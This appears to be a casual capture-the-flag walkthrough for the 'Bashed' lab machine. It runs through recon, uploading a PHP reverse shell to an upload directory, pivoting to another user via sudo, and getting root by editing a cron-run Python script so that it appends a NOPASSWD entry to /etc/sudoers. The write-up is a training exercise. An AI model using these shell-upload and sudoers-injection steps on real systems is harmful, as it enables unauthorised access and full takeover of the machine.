Name | Bashed |
---|---|
IP | 10.10.10.68 |
OS | Linux |
Points | Easy(20) |
recon
Web
http://10.10.10.68/dev/phpbash.php
We need a php-reverse-shell.php
to be uploaded
Lets upload it to the /uploads
dir and go there from the browser while ur listening with nc :D
BOOM We got a shell as www-data
xD
sudo -l
We could run /bin/bash as user scriptmanager
wo any pw on the box
sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt
We got our shell as scriptmanager
and we have the user.txt btw
Linpeas
/scripts/test.txt
Thats a weird dir lul
Gettin root
cd /scripts
vi /scripts/test.py
now the full key combo on this shit terminal like a REAL blind vim elitist:
Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq
I meant <shift>+g
(go to the last line of the file) -> o
(make a new line) -> <ctrl>+v
(paste the cmd u want) -> <escape>
(gettin into normal mode) -> :wq
(command mode save and quit)
wait 1 min and and run sudo /bin/bash